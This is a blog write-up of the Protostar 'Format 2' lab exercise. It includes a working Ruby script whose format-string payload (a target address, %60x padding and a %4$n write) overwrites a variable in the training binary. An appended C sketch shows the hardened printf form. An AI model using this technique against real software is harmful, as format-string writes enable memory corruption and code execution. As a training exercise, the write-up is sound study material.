Saturday 24 August 2013

Exploit exercises - Protostar - Format 2

Format 2 was quite easy, even easier than format 1 for me. All you need is to write the appropriate value to the target address.


First, I located my own input string on the stack using gdb: its first 4 bytes are the fourth argument as seen from inside the format string. I also found the address of target using objdump -t. I used a %60x conversion which, together with the 4-byte address, brings the number of bytes written to 64, so %n stores 0x40 (64 decimal) into target. I wrote a simple script that does the work:

#!/usr/bin/ruby1.9.1
require 'open3'

# 4-byte little-endian address of target (found with objdump -t), then
# %60x pads the output to 4 + 60 = 64 bytes, then %4$n writes that count
# (0x40) through the 4th argument, which is the address at the start of our string.
fmt_string = "\xe4\x96\x04\x08%60x%4$n"

# Run format2 and feed the format string on stdin; puts appends the newline fgets expects.
stdin, stdout, stderr = Open3.popen3('/opt/protostar/bin/format2')
puts fmt_string
stdin.puts fmt_string

# First line echoes the formatted input, second line reports whether target was modified.
puts stdout.gets
puts stdout.gets

Screenshot:
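As an added illustration that is not part of the original post: a C sketch of the defensive side of what the post exploits. The format2 source is not shown above, so the printf(buffer) pattern and the global target below are assumptions mirroring the exercise; next to it is the hardened printf("%s", buffer) form, and a small helper, bytes_before_n, that checks the post's arithmetic (4 address bytes plus a width-60 conversion gives 64 bytes written before %n).

```c
#include <stdio.h>
#include <string.h>

int target;  /* assumed: mirrors format2's global that %n overwrites */

/* Hardened form. The untrusted line is only ever a %s argument, so any
 * '%' sequences in it are printed literally, never interpreted. The bug
 * in format2 (assumed) is the one-argument form:  printf(buffer);  */
static int safe_print(const char *buffer)
{
    return printf("%s", buffer);
}

/* Returns 1 when rendering buffer through the hardened form reproduces it
 * byte-for-byte and leaves target untouched (no write happened). */
static int safe_render_matches(const char *buffer)
{
    char out[256];
    int before = target;
    snprintf(out, sizeof out, "%s", buffer);
    return strcmp(out, buffer) == 0 && target == before;
}

/* Bytes printf would have emitted before the first %n, assuming every
 * earlier conversion is padded to its explicit width (true for %60x with
 * an 8-digit value). Handles "%%" and positional "N$" forms. -1 if no %n. */
static long bytes_before_n(const char *fmt)
{
    long count = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%') { count++; continue; }
        p++;
        if (*p == '%') { count++; continue; }
        const char *q = p;                      /* optional "4$" positional index */
        while (*q >= '0' && *q <= '9') q++;
        if (*q == '$') p = q + 1;
        while (*p && strchr("-+ #0", *p)) p++;  /* flags */
        long width = 0;
        while (*p >= '0' && *p <= '9') width = width * 10 + (*p++ - '0');
        if (*p == 'n') return count;
        if (*p == '\0') return -1;
        count += width;
    }
    return -1;
}
```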
